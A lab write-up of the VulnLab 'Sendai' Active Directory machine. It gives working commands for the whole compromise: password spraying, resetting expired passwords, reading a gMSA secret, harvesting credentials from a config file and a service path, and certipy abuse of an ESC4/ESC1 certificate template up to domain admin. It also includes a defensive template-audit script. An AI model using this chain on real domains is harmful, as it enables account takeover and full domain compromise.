VulnLab - Sendai Writeup

Liam Geyer

👾 Machine Overview


This is a writeup of the machine Sendai from VulnLab. It's a medium-difficulty Windows machine that featured a pretty straightforward AD path and ESC4.

๐Ÿ” Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC -Pn 10.10.87.215
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 15:58 EDT
Nmap scan report for 10.10.87.215
Host is up (0.099s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-29 19:59:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sendai.vl
| Not valid before: 2023-07-11T09:24:23
|_Not valid after: 2024-07-10T09:24:23
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Not valid before: 2024-09-28T19:56:10
|_Not valid after: 2025-03-30T19:56:10
|_ssl-date: 2024-09-29T20:00:28+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: SENDAI
| NetBIOS_Domain_Name: SENDAI
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sendai.vl
| DNS_Computer_Name: dc.sendai.vl
| DNS_Tree_Name: sendai.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-09-29T19:59:48+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-09-29T19:59:49
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.34 seconds

I started off by adding dc.sendai.vl and sendai.vl to my /etc/hosts.

Next, I checked out the webpage, which was a default IIS page. Gobusting with big.txt didn't reveal anything interesting, and I checked subdomains/vhosts as well.

Anonymous LDAP wasn't allowed, but I was able to authenticate to SMB as Guest and run a RID brute-force.

nxc smb dc.sendai.vl --rid-brute -u Guest -p ""
SMB 10.10.87.215 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.87.215 445 DC [+] sendai.vl\Guest:
SMB 10.10.87.215 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.87.215 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.10.87.215 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.10.87.215 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.10.87.215 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.10.87.215 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.10.87.215 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.10.87.215 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.10.87.215 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.10.87.215 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.10.87.215 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.10.87.215 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.10.87.215 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.87.215 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.87.215 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.87.215 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.10.87.215 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.10.87.215 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.87.215 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.87.215 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.87.215 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.87.215 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.10.87.215 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.10.87.215 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.87.215 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.10.87.215 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.10.87.215 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.10.87.215 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.10.87.215 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.10.87.215 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.10.87.215 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.10.87.215 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.10.87.215 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.10.87.215 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.10.87.215 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.10.87.215 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.10.87.215 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.10.87.215 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.10.87.215 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.10.87.215 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.10.87.215 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.10.87.215 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.10.87.215 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.10.87.215 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.10.87.215 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.10.87.215 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.10.87.215 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.10.87.215 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.10.87.215 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.10.87.215 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.10.87.215 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.10.87.215 445 DC 1131: SENDAI\support (SidTypeGroup)

This gave us a list of users, which I tried ASREPRoasting to no avail.

📂 SMB

I authenticated to SMB as the guest account to check out the available shares.

smbclient -L \\\\dc.sendai.vl\\ -U "guest"

Password for [WORKGROUP\guest]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available

config, sendai, and Users all look interesting. I started off by checking out the sendai share.

smb: \> dir
. D 0 Tue Jul 18 13:31:04 2023
.. DHS 0 Wed Jul 19 10:11:25 2023
hr D 0 Tue Jul 11 08:58:19 2023
incident.txt A 1372 Tue Jul 18 13:34:15 2023
it D 0 Tue Jul 18 09:16:46 2023
legal D 0 Tue Jul 11 08:58:23 2023
security D 0 Tue Jul 18 09:17:35 2023
transfer D 0 Tue Jul 11 09:00:20 2023

There are several documents in here, but the only really noteworthy one contained some information about weak passwords.

🪦 Expired Passwords

Dear valued employees,

We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.

To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.

We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.

If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.

Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.

The note says that, due to the pervasive use of weak passwords, all accounts with a bad password would have their passwords expired. To check for this, I sprayed an empty password at our user list.

nxc smb dc.sendai.vl --rid-brute -u user.list -p "" --continue-on-success

This got us the following accounts:

Elliot.Yates
Thomas.Powell

We're able to use Impacket's smbpasswd.py to reset both of these passwords.

โฏ smbpasswd.py [email protected] -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
โฏ smbpasswd.py [email protected] -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

🧔 User

Now with our new user, I ran bloodhound-python to remotely gather data.

Support Path

It looks like both of our users are in the Support group, which has a clear path to user on the DC. We'll need to add our user to the admsvc group and then read the GMSA password on mgtsvc.

First, we need to add our user to the admsvc group.

net rpc group addmem "ADMSVC" "thomas.powell" -U "SENDAI.VL"/"thomas.powell"%"Password123" -S sendai.vl

Next, we can use bloodyAD to read the GMSA password of the mgtsvc account.

bloodyAD --host sendai.vl -d "sendai.vl" -u "Thomas.Powell" -p "Password123" get object MGTSVC$ --attr msDS-ManagedPassword

๐Ÿ† Root

Now, we can log in as MGTSVC on the DC.

Sliver Sessions

I started out by checking out our groups and privileges, not seeing anything super cool.

We're now able to view C:\config, which had an interesting .sqlconfig file.

Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=[SNIPPED];

I took the password from this file and sprayed it at our user list.

nxc smb sendai.vl -u user.list -p [PASSWORD] --continue-on-success

This got us creds for the sqlsvc account. I think our two paths forward are either through SQL or through ADCS, as there's an interesting CA-Operators group in AD.

CA Operators

The two users in this group are anthony.smith and clifford.davey. I ran certipy find to see if there are any vulnerable certificate templates.

certipy find -vulnerable -username [email protected] -password [PASS] -dc-ip [DC IP]

It looks like the SendaiComputer template is vulnerable to ESC4.

"Certificate Templates": {
"0": {
"Template Name": "SendaiComputer",
"Display Name": "SendaiComputer",
"Certificate Authorities": [
"sendai-DC-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Server Authentication",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "100 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 4096,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Domain Computers",
"SENDAI.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SENDAI.VL\\Administrator",
"Full Control Principals": [
"SENDAI.VL\\ca-operators"
],
"Write Owner Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
],
"Write Dacl Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
],
"Write Property Principals": [
"SENDAI.VL\\Domain Admins",
"SENDAI.VL\\Enterprise Admins",
"SENDAI.VL\\Administrator",
"SENDAI.VL\\ca-operators"
]
}
},
"[!] Vulnerabilities": {
"ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"
}

If we can compromise a CA-Operator, we can rewrite this template to make it vulnerable to ESC1.
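The following is an added audit example, not code from the writeup or from certipy: it reads the same template keys certipy `find` prints (the SendaiComputer dump above, trimmed and embedded as constructed sample data) and flags the ESC4 condition (a principal outside an assumed trusted admin set can rewrite the template object) and the ESC1 condition (a non-admin enrollee may supply the SAN on a client-auth template). The `after_esc4_rewrite` helper is a constructed model of the template state the ESC4 pivot described above produces, and `hardened` shows the remediation; the `TRUSTED` set and all function names are this example's assumptions.

```python
# Added audit example (not from the writeup or from certipy): check the template
# keys certipy `find` prints for ESC4/ESC1. Sample data is constructed from the dump.
import copy

ADMINS = ["SENDAI.VL\\Domain Admins", "SENDAI.VL\\Enterprise Admins",
          "SENDAI.VL\\Administrator"]
TRUSTED = set(ADMINS)  # assumption: the only principals that should control templates
CONTROL_KEYS = ("Full Control Principals", "Write Owner Principals",
                "Write Dacl Principals", "Write Property Principals")

SENDAI_COMPUTER = {  # trimmed to the keys the audit needs
    "Template Name": "SendaiComputer", "Enabled": True,
    "Client Authentication": True, "Enrollee Supplies Subject": False,
    "Requires Manager Approval": False, "Authorized Signatures Required": 0,
    "Permissions": {
        "Enrollment Permissions": {"Enrollment Rights": ADMINS[:2] + [
            "SENDAI.VL\\Domain Computers"]},
        "Object Control Permissions": {
            "Full Control Principals": ["SENDAI.VL\\ca-operators"],
            **{k: ADMINS + ["SENDAI.VL\\ca-operators"] for k in CONTROL_KEYS[1:]}}}}

def audit_template(tpl, trusted=TRUSTED):
    """Return findings for one template: 'ESC4: ...' and/or 'ESC1: ...'."""
    findings, perms, name = [], tpl["Permissions"], tpl["Template Name"]
    # ESC4: anyone outside the trusted set who can rewrite the template object
    for key in CONTROL_KEYS:
        for p in perms["Object Control Permissions"].get(key, []):
            if p not in trusted:
                findings.append(f"ESC4: {p} has {key.removesuffix(' Principals')} on {name}")
    # ESC1: a non-admin enrollee may choose the SAN on a client-auth template
    low_priv = set(perms["Enrollment Permissions"]["Enrollment Rights"]) - trusted
    if (tpl["Enabled"] and tpl["Client Authentication"] and low_priv
            and tpl["Enrollee Supplies Subject"] and not tpl["Requires Manager Approval"]
            and tpl["Authorized Signatures Required"] == 0):
        findings.append(f"ESC1: {', '.join(sorted(low_priv))} may supply a SAN on {name}")
    return findings

def after_esc4_rewrite(tpl):
    """Constructed: what an ESC4 holder leaves behind, i.e. the ESC1 state."""
    t = copy.deepcopy(tpl)
    t["Enrollee Supplies Subject"] = True
    t["Permissions"]["Enrollment Permissions"]["Enrollment Rights"].append("SENDAI.VL\\Domain Users")
    return t

def hardened(tpl):
    """Remediation: strip ca-operators from every object-control ACE."""
    t = copy.deepcopy(tpl)
    ctl = t["Permissions"]["Object Control Permissions"]
    for key in CONTROL_KEYS:
        ctl[key] = [p for p in ctl.get(key, []) if p in TRUSTED]
    return t
```

Run the same audit over every entry of certipy's `Certificate Templates` output to catch the misconfiguration before someone with template write rights turns it into ESC1.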

I ran PrivEscCheck to see if we could find credentials for a CA-Operator.

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

[SNIPPED]
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p [SNIPPED] -k netsvcs
User : LocalSystem
StartMode : Automatic

We're able to see the password for clifford.davey used as a CLI argument for C:\Windows\helpdesk.exe. Now we can exploit the vulnerable template.

# Make template vuln to ESC1
certipy template -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -template SendaiComputer -save-old

# Exploit ESC1
certipy req -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn [email protected]

# Auth w ticket
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'sendai.vl' -dc-ip 10.10.114.72

# Restore config - clean up
certipy template -username [email protected] -password [PASS] -dc-ip 10.10.114.72 -template SendaiComputer -configuration SendaiComputer.json

Now, we have the admin's hash and can WinRM in to grab the flag, YIPPEE!

📖 Resources

Cybersec Notes: ESC4
  • Title: VulnLab - Sendai Writeup
  • Author: Liam Geyer
  • Created at : 2024-12-27 00:00:00
  • Updated at : 2024-12-27 22:33:29
  • Link: https://lfgberg.org/2024/12/27/vulnlab/sendai/
  • License: This work is licensed under CC BY-NC-SA 4.0.